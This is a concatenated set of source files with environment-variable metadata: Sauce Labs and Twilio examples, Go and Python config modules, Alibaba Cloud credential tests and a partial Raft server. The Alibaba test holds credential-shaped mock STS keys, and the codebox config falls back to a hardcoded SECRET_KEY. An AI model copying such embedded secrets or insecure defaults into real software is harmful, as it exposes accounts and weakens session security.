new Object[]{"iOS", "iPhone X Simulator", "12.2", "1.13.0", "portrait"},
new Object[]{"iOS", "iPad Pro (12.9 inch) Simulator", "12.2", "1.13.0", "portrait"}
};
}
/**
* @return the {@link iosDriver} for the current thread
*/
public IOSDriver getiosDriver() {
return iosDriver.get();
}
/**
*
* @return the Sauce Job id for the current thread
*/
public String getSessionId() {
return sessionId.get();
}
/**
*
* @return the {@link SauceOnDemandAuthentication} instance containing the Sauce username/access key
*/
@Override
public SauceOnDemandAuthentication getAuthentication() {
return authentication;
}
/**
* Constructs a new {@link IOSDriver} instance which is configured to use the capabilities defined by the browser,
* version and os parameters, and which is configured to run against ondemand.saucelabs.com, using
* the username and access key populated by the {@link #authentication} instance.
*
* @param platformName name of the platformName. (Android, iOS, etc.)
* @param deviceName name of the device
* @param platformVersion Os version of the device
* @param appiumVersion appium version
* @param deviceOrientation device orientation
* @return
* @throws MalformedURLException if an error occurs parsing the url
*/
protected void createDriver(
String platformName,
String deviceName,
String platformVersion,
String appiumVersion,
String deviceOrientation,
String methodName)
throws MalformedURLException, UnexpectedException {
MutableCapabilities capabilities = new MutableCapabilities();
capabilities.setCapability("platformName", platformName);
capabilities.setCapability("platformVersion", platformVersion);
capabilities.setCapability("deviceName", deviceName);
capabilities.setCapability("browserName", "");
capabilities.setCapability("deviceOrientation", deviceOrientation);
capabilities.setCapability("appiumVersion", appiumVersion);
capabilities.setCapability("name", methodName);
capabilities.setCapability("build","Java-TestNG-Appium-iOS");
capabilities.setCapability("app", app);
if (buildTag != null) {
capabilities.setCapability("build", buildTag);
}
// Launch remote browser and set it as the current thread
iosDriver.set(new IOSDriver(
new URL("https://" + authentication.getUsername() + ":" + authentication.getAccessKey() + seleniumURI +"/wd/hub"),
capabilities));
String id = ((RemoteWebDriver) getiosDriver()).getSessionId().toString();
sessionId.set(id);
}
/**
* Method that gets invoked after test.
* Dumps browser log and
* Closes the browser
*/
@AfterMethod
public void tearDown() throws Exception {
//Gets browser logs if available.
iosDriver.get().quit();
}
}
| [
"\"BUILD_TAG\"",
"\"SAUCE_USERNAME\"",
"\"SAUCE_ACCESS_KEY\""
]
| []
| [
"SAUCE_USERNAME",
"SAUCE_ACCESS_KEY",
"BUILD_TAG"
]
| [] | ["SAUCE_USERNAME", "SAUCE_ACCESS_KEY", "BUILD_TAG"] | java | 3 | 0 | |
examples/service/proxy/session_interaction/page/session_interaction_page_example.go | package main
import (
"log"
"os"
"github.com/RJPearson94/twilio-sdk-go"
v1 "github.com/RJPearson94/twilio-sdk-go/service/proxy/v1"
"github.com/RJPearson94/twilio-sdk-go/service/proxy/v1/service/session/interactions"
"github.com/RJPearson94/twilio-sdk-go/session/credentials"
)
var proxyClient *v1.Proxy
func init() {
creds, err := credentials.New(credentials.Account{
Sid: os.Getenv("TWILIO_ACCOUNT_SID"),
AuthToken: os.Getenv("TWILIO_AUTH_TOKEN"),
})
if err != nil {
log.Panicf("%s", err.Error())
}
proxyClient = twilio.NewWithCredentials(creds).Proxy.V1
}
func main() {
resp, err := proxyClient.
Service("KSXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").
Session("KCXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").
Interactions.
Page(&interactions.InteractionsPageOptions{})
if err != nil {
log.Panicf("%s", err.Error())
}
log.Printf("%v interaction(s) found on page", len(resp.Interactions))
}
| [
"\"TWILIO_ACCOUNT_SID\"",
"\"TWILIO_AUTH_TOKEN\""
]
| []
| [
"TWILIO_AUTH_TOKEN",
"TWILIO_ACCOUNT_SID"
]
| [] | ["TWILIO_AUTH_TOKEN", "TWILIO_ACCOUNT_SID"] | go | 2 | 0 | |
config/config.go | package config
import (
"os"
"github.com/jinzhu/configor"
"github.com/qor/auth/providers/facebook"
"github.com/qor/auth/providers/github"
"github.com/qor/auth/providers/google"
"github.com/qor/auth/providers/twitter"
"github.com/qor/location"
"github.com/qor/mailer"
"github.com/qor/mailer/logger"
"github.com/qor/media/oss"
"github.com/qor/oss/s3"
"github.com/qor/redirect_back"
"github.com/qor/session/manager"
)
type SMTPConfig struct {
Host string
Port string
User string
Password string
}
var Config = struct {
Port uint `default:"9003" env:"PORT"`
DB struct {
Name string `env:"DBName" default:"qor_example"`
Adapter string `env:"DBAdapter" default:"mysql"`
Host string `env:"DBHost" default:"localhost"`
Port string `env:"DBPort" default:"3306"`
User string `env:"DBUser"`
Password string `env:"DBPassword"`
}
S3 struct {
AccessKeyID string `env:"AWS_ACCESS_KEY_ID"`
SecretAccessKey string `env:"AWS_SECRET_ACCESS_KEY"`
Region string `env:"AWS_Region"`
S3Bucket string `env:"AWS_Bucket"`
}
SMTP SMTPConfig
Github github.Config
Google google.Config
Facebook facebook.Config
Twitter twitter.Config
GoogleAPIKey string `env:"GoogleAPIKey"`
BaiduAPIKey string `env:"BaiduAPIKey"`
}{}
var (
Root = os.Getenv("GOPATH") + "/src/github.com/qor/qor-example"
Mailer *mailer.Mailer
RedirectBack = redirect_back.New(&redirect_back.Config{
SessionManager: manager.SessionManager,
IgnoredPrefixes: []string{"/auth"},
})
)
func init() {
if err := configor.Load(&Config, "config/database.yml", "config/smtp.yml", "config/application.yml"); err != nil {
panic(err)
}
location.GoogleAPIKey = Config.GoogleAPIKey
location.BaiduAPIKey = Config.BaiduAPIKey
if Config.S3.AccessKeyID != "" {
oss.Storage = s3.New(&s3.Config{
AccessID: Config.S3.AccessKeyID,
AccessKey: Config.S3.SecretAccessKey,
Region: Config.S3.Region,
Bucket: Config.S3.S3Bucket,
})
}
// dialer := gomail.NewDialer(Config.SMTP.Host, Config.SMTP.Port, Config.SMTP.User, Config.SMTP.Password)
// sender, err := dialer.Dial()
// Mailer = mailer.New(&mailer.Config{
// Sender: gomailer.New(&gomailer.Config{Sender: sender}),
// })
Mailer = mailer.New(&mailer.Config{
Sender: logger.New(&logger.Config{}),
})
}
| [
"\"GOPATH\""
]
| []
| [
"GOPATH"
]
| [] | ["GOPATH"] | go | 1 | 0 | |
python-function-test/alibabacloud_credentials_test.py | # Copyright 2019 Alibaba Cloud Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import mock
from alibabacloud import get_client
from alibabacloud.client import AlibabaCloudClient
from alibabacloud.client import ClientConfig
from alibabacloud.credentials import AccessKeyCredentials
from alibabacloud.credentials.provider import RamRoleCredentialsProvider, \
DefaultChainedCredentialsProvider
from alibabacloud.exceptions import ServerException, PartialCredentialsException
from alibabacloud.request import APIRequest
from alibabacloud.vendored import requests
from base import SDKTestBase, MyServer
role_name = {u'Code': u'Success', u'LastUpdated': u'2019-04-09T10:41:31Z',
u'AccessKeyId': u'STS.NHLK9qYbdbKgs4oYTRXqjLSdX',
u'AccessKeySecret': u'J94mBKoeEUzDGwgUUsdXcf8hdbDm9Pht4A4R9vKParVT',
u'Expiration': u'2019-04-09T16:41:31Z',
u'SecurityToken': u'CAISigJ1q6Ft5B2yfSjIr4'
u'v5AIPFtL1F1YmMcRLevVQHVP5Go5bPujz2IHlFeXBoCekes/8'
u'yn29S6vwalrRtTtpfTEmBbI569s0M9hGjPZSQsM+n5qVUk5+1'
u'BjBe3ZEEFIqADd/iRfbxJ92PCTmd5AIRrJL+cTK9JS/HVbSCl'
u'Z9gaPkOQwC8dkAoLdxKJwxk2qR4XDmrQpTLCBPxhXfKB0dFox'
u'd1jXgFiZ6y2cqB8BHT/jaYo603392gcsj+NJc1ZssjA47oh7R'
u'MG/CfgHIK2X9j77xriaFIwzDDs+yGDkNZixf8aLOFr4Q3fFYh'
u'O/NnQPEe8KKkj5t1sffJnoHtzBJAIexOTzRtjFVtcH5xchqAA'
u'U8ECYWEiFKZtXwEpMnJUW4UXeXgzhMYDCeoLzrwQxcDwxpVEH'
u'KfA1zt+i/yAOXhJ1EgWwDPjyIeeFiR5VypJaHstnq/P0Jv/Uq'
u'ZAOS88KwDNLMHAc34HwmPNUnlsWc95B40ys91qtyHxQa1Jjjs'
u'LgE/S/5WyUQslQmuQI6e/rnT'}
class CredentialsTest(SDKTestBase):
def _init_client(self, service_name, api_version=None, region_id='cn-hangzhou'):
client = get_client(service_name=service_name, api_version=api_version,
region_id=region_id,
access_key_id=self.access_key_id,
access_key_secret=self.access_key_secret,
config=self.init_client_config())
return client
def test_call_request_with_client_env_priority(self):
self._create_default_ram_user()
self._create_access_key()
self._create_default_ram_role()
ram_role_arn_credential = RamRoleCredentialsProvider(
self.client_config,
AccessKeyCredentials(self.ram_user_access_key_id,
self.ram_user_access_key_secret),
self.ram_role_arn,
"alice_test")
client = AlibabaCloudClient(self.client_config, ram_role_arn_credential)
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
os.environ["ALIBABA_CLOUD_ACCESS_KEY_ID"] = self.access_key_id
os.environ["ALIBABA_CLOUD_ACCESS_KEY_SECRET"] = self.access_key_secret
response = client._handle_request(api_request)
response_credential = response.http_request.credentials
self.assertTrue(response_credential.access_key_id.startswith("STS."))
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
def test_call_request_with_env_config_priority(self):
os.environ.setdefault("ALIBABA_CLOUD_ACCESS_KEY_ID", self.access_key_id)
os.environ.setdefault("ALIBABA_CLOUD_ACCESS_KEY_SECRET", self.access_key_secret)
client_config = ClientConfig(region_id=self.region_id)
client = AlibabaCloudClient(client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
env_credential_id = os.environ.get("ALIBABA_CLOUD_ACCESS_KEY_ID")
env_credential_secret = os.environ.get("ALIBABA_CLOUD_ACCESS_KEY_SECRET")
response_key_id = response.http_request.credentials.access_key_id
response_key_secret = response.http_request.credentials.access_key_secret
self.assertEqual(env_credential_id, response_key_id)
self.assertEqual(env_credential_secret, response_key_secret)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
os.environ.pop("ALIBABA_CLOUD_ACCESS_KEY_ID")
os.environ.pop("ALIBABA_CLOUD_ACCESS_KEY_SECRET")
def test_call_request_with_env_role_name_priority(self):
os.environ.setdefault("ALIBABA_CLOUD_ACCESS_KEY_ID", self.access_key_id)
os.environ.setdefault("ALIBABA_CLOUD_ACCESS_KEY_SECRET", self.access_key_secret)
os.environ.setdefault("ALIBABA_CLOUD_ROLE_NAME", self.default_ram_role_name)
client_config = ClientConfig(region_id=self.region_id)
client = AlibabaCloudClient(client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
env_credential_id = os.environ.get("ALIBABA_CLOUD_ACCESS_KEY_ID")
env_credential_secret = os.environ.get("ALIBABA_CLOUD_ACCESS_KEY_SECRET")
response_key_id = response.http_request.credentials.access_key_id
response_key_secret = response.http_request.credentials.access_key_secret
self.assertEqual(env_credential_id, response_key_id)
self.assertEqual(env_credential_secret, response_key_secret)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
os.environ.pop("ALIBABA_CLOUD_ACCESS_KEY_ID")
os.environ.pop("ALIBABA_CLOUD_ACCESS_KEY_SECRET")
os.environ.pop("ALIBABA_CLOUD_ROLE_NAME")
def test_call_request_with_config_role_name_priority(self):
os.environ["ALIBABA_CLOUD_ROLE_NAME"] = self.default_ram_role_name
client_config = ClientConfig(region_id=self.region_id)
client = AlibabaCloudClient(client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
response_key_id = response.http_request.credentials.access_key_id
self.assertFalse(response_key_id.startswith("TST."))
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
os.environ.pop("ALIBABA_CLOUD_ROLE_NAME")
def test_call_rpc_request_with_introduction_ak(self):
client = AlibabaCloudClient(self.client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
response_credentials = response.http_request.credentials
from alibabacloud.credentials import AccessKeyCredentials
self.assertEqual(type(response_credentials), AccessKeyCredentials)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
def test_call_roa_request_with_introduction_ak(self):
client = AlibabaCloudClient(self.client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "ROS"
client.api_version = "2015-09-01"
client.location_service_code = 'ros'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeResourceTypes', 'GET', 'https', 'ROA')
api_request.uri_pattern = '/resource_types'
api_request.path_params = None
response = client._handle_request(api_request)
response_credentials = response.http_request.credentials
from alibabacloud.credentials import AccessKeyCredentials
self.assertEqual(type(response_credentials), AccessKeyCredentials)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("ResourceTypes"))
def test_call_rpc_request_with_sts_token(self):
self._create_default_ram_user()
# self._attach_default_policy()
self._create_access_key()
self._create_default_ram_role()
acs_client = ClientConfig(region_id=self.region_id)
ram_role_arn_credential = RamRoleCredentialsProvider(
acs_client,
AccessKeyCredentials(self.ram_user_access_key_id,
self.ram_user_access_key_secret),
self.ram_role_arn,
"alice_test")
client = AlibabaCloudClient(acs_client, ram_role_arn_credential)
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
response_credentials = response.http_request.credentials
self.assertTrue(response_credentials.access_key_id.startswith("STS."))
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
def test_call_roa_request_with_ram_role(self):
self._create_default_ram_user()
# self._attach_default_policy()
self._create_access_key()
self._create_default_ram_role()
roa_client = ClientConfig(region_id=self.region_id)
ram_role_arn_credential = RamRoleCredentialsProvider(
roa_client,
AccessKeyCredentials(self.ram_user_access_key_id,
self.ram_user_access_key_secret),
self.ram_role_arn,
"alice_test")
client = AlibabaCloudClient(roa_client, ram_role_arn_credential)
client.product_code = "ROS"
client.api_version = "2015-09-01"
client.location_service_code = 'ros'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeResourceTypes', 'GET', 'https', 'ROA')
api_request.uri_pattern = '/resource_types'
api_request.path_params = None
response = client._handle_request(api_request)
response_credentials = response.http_request.credentials
self.assertTrue(response_credentials.access_key_id.startswith("STS."))
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("ResourceTypes"))
def test_call_rpc_request_with_env_ak(self):
os.environ["ALIBABA_CLOUD_ACCESS_KEY_ID"] = self.access_key_id
os.environ["ALIBABA_CLOUD_ACCESS_KEY_SECRET"] = self.access_key_secret
client_config = ClientConfig(region_id=self.region_id)
client = AlibabaCloudClient(client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
def test_call_roa_request_with_env_ak(self):
os.environ["ALIBABA_CLOUD_ACCESS_KEY_ID"] = self.access_key_id
os.environ["ALIBABA_CLOUD_ACCESS_KEY_SECRET"] = self.access_key_secret
client_config = ClientConfig(region_id=self.region_id)
client = AlibabaCloudClient(client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "ROS"
client.api_version = "2015-09-01"
client.location_service_code = 'ros'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeResourceTypes', 'GET', 'https', 'ROA')
api_request.uri_pattern = '/resource_types'
api_request.path_params = None
response = client._handle_request(api_request)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("ResourceTypes"))
os.environ.pop("ALIBABA_CLOUD_ACCESS_KEY_ID")
os.environ.pop("ALIBABA_CLOUD_ACCESS_KEY_SECRET")
@mock.patch("alibabacloud.credentials.provider.InstanceProfileCredentialsProvider")
def test_call_rpc_request_with_role_name(self, InstanceProfileCredentialsProvider):
with MyServer() as f:
os.environ["ALIBABA_CLOUD_ROLE_NAME"] = self.default_ram_role_name
InstanceProfileCredentialsProvider.rotate_credentials.return_value = \
requests.get(url="http://localhost:51352")
InstanceProfileCredentialsProvider.rotate_credentials. \
return_value = role_name
self.assertTrue(InstanceProfileCredentialsProvider.rotate_credentials)
def test_call_rpc_request_with_config_default(self):
client = AlibabaCloudClient(self.client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
response = client._handle_request(api_request)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("Regions"))
self.assertTrue(ret.get("RequestId"))
def test_call_roa_request_with_config_default(self):
client = AlibabaCloudClient(self.client_config,
credentials_provider=self.init_credentials_provider())
client.product_code = "ROS"
client.api_version = "2015-09-01"
client.location_service_code = 'ros'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeResourceTypes', 'GET', 'https', 'ROA')
api_request.uri_pattern = '/resource_types'
api_request.path_params = None
response = client._handle_request(api_request)
response = response.http_response.content
ret = self.get_dict_response(response)
self.assertTrue(ret.get("ResourceTypes"))
def test_call_rpc_request_with_key_error(self):
def init_credentials_provider():
from alibabacloud.credentials import AccessKeyCredentials
credentials = AccessKeyCredentials(access_key_id="BadAccessKeyId",
access_key_secret=self.access_key_secret)
from alibabacloud.credentials.provider import StaticCredentialsProvider
credentials_provider = StaticCredentialsProvider(credentials)
return credentials_provider
client = AlibabaCloudClient(self.client_config,
credentials_provider=init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
with self.assertRaises(ServerException) as e:
client._handle_request(api_request)
self.assertEqual(e.exception.service_name, "Ecs")
self.assertEqual(e.exception.http_status, 404)
self.assertEqual(e.exception.endpoint, "ecs-cn-hangzhou.aliyuncs.com")
self.assertEqual(e.exception.error_code, "InvalidAccessKeyId.NotFound")
self.assertEqual(e.exception.error_message, "Specified access key is not found.")
def test_call_roa_request_with_key_error(self):
def init_credentials_provider():
from alibabacloud.credentials import AccessKeyCredentials
credentials = AccessKeyCredentials(access_key_id="BadAccessKeyId",
access_key_secret=self.access_key_secret)
from alibabacloud.credentials.provider import StaticCredentialsProvider
credentials_provider = StaticCredentialsProvider(credentials)
return credentials_provider
client = AlibabaCloudClient(self.client_config,
credentials_provider=init_credentials_provider())
client.product_code = "ROS"
client.api_version = "2015-09-01"
client.location_service_code = 'ros'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeResourceTypes', 'GET', 'https', 'ROA')
with self.assertRaises(ServerException) as e:
client._handle_request(api_request)
self.assertEqual(e.exception.service_name, "ROS")
self.assertEqual(e.exception.http_status, 404)
self.assertEqual(e.exception.endpoint, "ros.aliyuncs.com")
self.assertEqual(e.exception.error_code, "InvalidAction.NotFound")
self.assertEqual(e.exception.error_message,
"Specified api is not found, please check your url and method.")
def test_call_rpc_request_with_secret_error(self):
def init_credentials_provider():
from alibabacloud.credentials import AccessKeyCredentials
credentials = AccessKeyCredentials(access_key_id=self.access_key_id,
access_key_secret="BadAccessKeySecret")
from alibabacloud.credentials.provider import StaticCredentialsProvider
credentials_provider = StaticCredentialsProvider(credentials)
return credentials_provider
client = AlibabaCloudClient(self.client_config,
credentials_provider=init_credentials_provider())
client.product_code = "Ecs"
client.api_version = "2014-05-26"
client.location_service_code = 'ecs'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeRegions', 'GET', 'https', 'RPC')
with self.assertRaises(ServerException) as e:
client._handle_request(api_request)
self.assertEqual(e.exception.service_name, "Ecs")
self.assertEqual(e.exception.http_status, 400)
self.assertEqual(e.exception.endpoint, "ecs-cn-hangzhou.aliyuncs.com")
self.assertEqual(e.exception.error_code, "InvalidAccessKeySecret")
self.assertEqual(e.exception.error_message,
"The AccessKeySecret is incorrect. "
"Please check your AccessKeyId and AccessKeySecret.")
def test_call_roa_request_with_secret_error(self):
def init_credentials_provider():
from alibabacloud.credentials import AccessKeyCredentials
credentials = AccessKeyCredentials(access_key_id=self.access_key_id,
access_key_secret="BadAccessKeySecret")
from alibabacloud.credentials.provider import StaticCredentialsProvider
credentials_provider = StaticCredentialsProvider(credentials)
return credentials_provider
client = AlibabaCloudClient(self.client_config,
credentials_provider=init_credentials_provider())
client.product_code = "ROS"
client.api_version = "2015-09-01"
client.location_service_code = 'ros'
client.location_endpoint_type = "openAPI"
api_request = APIRequest('DescribeResourceTypes', 'GET', 'https', 'ROA')
with self.assertRaises(ServerException) as e:
client._handle_request(api_request)
self.assertEqual(e.exception.service_name, "ROS")
self.assertEqual(e.exception.http_status, 404)
self.assertEqual(e.exception.endpoint, "ros.aliyuncs.com")
self.assertEqual(e.exception.error_code, "InvalidAction.NotFound")
self.assertEqual(e.exception.error_message,
"Specified api is not found, please check your url and method.")
def test_call_request_with_env_error(self):
os.environ["ALIBABA_CLOUD_ACCESS_KEY_ID"] = self.access_key_id
client_config = ClientConfig(region_id=self.region_id)
with self.assertRaises(PartialCredentialsException) as e:
DefaultChainedCredentialsProvider(client_config)
self.assertEqual(e.exception.error_message,
"Partial credentials found in env, ALIBABA_CLOUD_ACCESS_KEY_SECRET is empty")
| []
| []
| [
"ALIBABA_CLOUD_ACCESS_KEY_ID",
"ALIBABA_CLOUD_ROLE_NAME",
"ALIBABA_CLOUD_ACCESS_KEY_SECRET"
]
| [] | ["ALIBABA_CLOUD_ACCESS_KEY_ID", "ALIBABA_CLOUD_ROLE_NAME", "ALIBABA_CLOUD_ACCESS_KEY_SECRET"] | python | 3 | 0 | |
manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'NetAutoMgmt.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| []
| []
| []
| [] | [] | python | 0 | 0 | |
codebox/conf.py | """
codebox.conf
~~~~~~~~~~~
:copyright: (c) 2011 DISQUS.
:license: Apache License 2.0, see LICENSE for more details.
"""
import os
import os.path
import sys
import urlparse
class Config(object):
DEBUG = os.environ.get('DEBUG', False)
TESTING = False
LOG_LEVEL = os.environ.get('LOG_LEVEL', 'DEBUG')
SECRET_KEY = os.environ.get('SECRET_KEY', '\x89\x1d\xec\x8eJ\xda=C`\xf3<X\x81\xff\x1e\r{+\x1b\xe1\xd1@ku')
REDIS_DB = 0
JANRAIN_API_KEY = os.environ.get('JANRAIN_API_KEY')
DOMAIN_BLACKLIST = ['gmail.com', 'hotmail.com', 'live.com', 'msn.com', 'yahoo.com', 'googlemail.com', 'facebookmail.com']
MAIL_SERVER = 'smtp.sendgrid.net'
MAIL_PORT = 25
MAIL_USERNAME = os.environ.get('SENDGRID_USERNAME')
MAIL_PASSWORD = os.environ.get('SENDGRID_PASSWORD')
MAIL_USE_TLS = True
MAIL_DOMAIN = os.environ.get('SENDGRID_DOMAIN', 'codebox.cc')
DEFAULT_MAIL_SENDER = '[email protected]'
if os.environ.has_key('SENTRY_DSN'):
try:
import raven
raven.load(os.environ['SENTRY_DSN'], Config.__dict__)
except:
print "Unexpected error:", sys.exc_info()
if os.environ.has_key('REDISTOGO_URL'):
# 'redis://username:[email protected]:6789'
urlparse.uses_netloc.append('redis')
url = urlparse.urlparse(os.environ['REDISTOGO_URL'])
Config.REDIS_PASSWORD = url.password
Config.REDIS_HOST = url.hostname
Config.REDIS_PORT = url.port
class TestingConfig(Config):
REDIS_DB = 9
TESTING = True
| []
| []
| [
"REDISTOGO_URL",
"LOG_LEVEL",
"SENDGRID_DOMAIN",
"JANRAIN_API_KEY",
"SECRET_KEY",
"SENDGRID_PASSWORD",
"SENDGRID_USERNAME",
"SENTRY_DSN",
"DEBUG"
]
| [] | ["REDISTOGO_URL", "LOG_LEVEL", "SENDGRID_DOMAIN", "JANRAIN_API_KEY", "SECRET_KEY", "SENDGRID_PASSWORD", "SENDGRID_USERNAME", "SENTRY_DSN", "DEBUG"] | python | 9 | 0 | |
sts/client.go | package sts
import (
"os"
"github.com/howardshaw/qcloudapi-sdk-go/common"
)
const (
StsHost = "sts.api.qcloud.com"
StsPath = "/v2/index.php"
)
type Client struct {
*common.Client
}
func NewClient(credential common.CredentialInterface, opts common.Opts) (*Client, error) {
if opts.Host == "" {
opts.Host = StsHost
}
if opts.Path == "" {
opts.Path = StsPath
}
client, err := common.NewClient(credential, opts)
if err != nil {
return &Client{}, err
}
return &Client{client}, nil
}
func NewClientFromEnv() (*Client, error) {
secretId := os.Getenv("QCloudSecretId")
secretKey := os.Getenv("QCloudSecretKey")
region := os.Getenv("QCloudStsAPIRegion")
host := os.Getenv("QCloudStsAPIHost")
path := os.Getenv("QCloudStsAPIPath")
return NewClient(
common.Credential{
secretId,
secretKey,
},
common.Opts{
Region: region,
Host: host,
Path: path,
},
)
}
| [
"\"QCloudSecretId\"",
"\"QCloudSecretKey\"",
"\"QCloudStsAPIRegion\"",
"\"QCloudStsAPIHost\"",
"\"QCloudStsAPIPath\""
]
| []
| [
"QCloudStsAPIHost",
"QCloudStsAPIPath",
"QCloudSecretId",
"QCloudSecretKey",
"QCloudStsAPIRegion"
]
| [] | ["QCloudStsAPIHost", "QCloudStsAPIPath", "QCloudSecretId", "QCloudSecretKey", "QCloudStsAPIRegion"] | go | 5 | 0 | |
part1/server.go | // Server container for a Raft Consensus Module. Exposes Raft to the network
// and enables RPCs between Raft peers.
//
// Eli Bendersky [https://eli.thegreenplace.net]
// This code is in the public domain.
package raft
import (
"fmt"
"log"
"math/rand"
"net"
"net/rpc"
"os"
"sync"
"time"
)
// Server wraps a raft.ConsensusModule along with a rpc.Server that exposes its
// methods as RPC endpoints. It also manages the peers of the Raft server. The
// main goal of this type is to simplify the code of raft.Server for
// presentation purposes. raft.ConsensusModule has a *Server to do its peer
// communication and doesn't have to worry about the specifics of running an
// RPC server.
type Server struct {
mu sync.Mutex
serverId int
peerIds []int
cm *ConsensusModule
rpcProxy *RPCProxy
rpcServer *rpc.Server
listener net.Listener
peerClients map[int]*rpc.Client
ready <-chan interface{}
quit chan interface{}
wg sync.WaitGroup
}
func NewServer(serverId int, peerIds []int, ready <-chan interface{}) *Server {
s := new(Server)
s.serverId = serverId
s.peerIds = peerIds
s.peerClients = make(map[int]*rpc.Client)
s.ready = ready
s.quit = make(chan interface{})
return s
}
func (s *Server) Serve() {
s.mu.Lock()
s.cm = NewConsensusModule(s.serverId, s.peerIds, s, s.ready)
// Create a new RPC server and register a RPCProxy that forwards all methods
// to n.cm
s.rpcServer = rpc.NewServer()
s.rpcProxy = &RPCProxy{cm: s.cm}
s.rpcServer.RegisterName("ConsensusModule", s.rpcProxy)
var err error
s.listener, err = net.Listen("tcp", ":0")
if err != nil {
log.Fatal(err)
}
log.Printf("[%v] listening at %s", s.serverId, s.listener.Addr())
s.mu.Unlock()
s.wg.Add(1)
go func() {
defer s.wg.Done()
for {
conn, err := s.listener.Accept()
if err != nil {
select {
case <-s.quit:
return
default:
log.Fatal("accept error:", err)
}
}
s.wg.Add(1)
go func() {
s.rpcServer.ServeConn(conn)
s.wg.Done()
}()
}
}()
}
// DisconnectAll closes all the client connections to peers for this server.
func (s *Server) DisconnectAll() {
s.mu.Lock()
defer s.mu.Unlock()
for id := range s.peerClients {
if s.peerClients[id] != nil {
s.peerClients[id].Close()
s.peerClients[id] = nil
}
}
}
// Shutdown closes the server and waits for it to shut down properly.
func (s *Server) Shutdown() {
s.cm.Stop()
close(s.quit)
s.listener.Close()
s.wg.Wait()
}
func (s *Server) GetListenAddr() net.Addr {
s.mu.Lock()
defer s.mu.Unlock()
return s.listener.Addr()
}
func (s *Server) ConnectToPeer(peerId int, addr net.Addr) error {
s.mu.Lock()
defer s.mu.Unlock()
if s.peerClients[peerId] == nil {
client, err := rpc.Dial(addr.Network(), addr.String())
if err != nil {
return err
}
s.peerClients[peerId] = client
}
return nil
}
// DisconnectPeer disconnects this server from the peer identified by peerId.
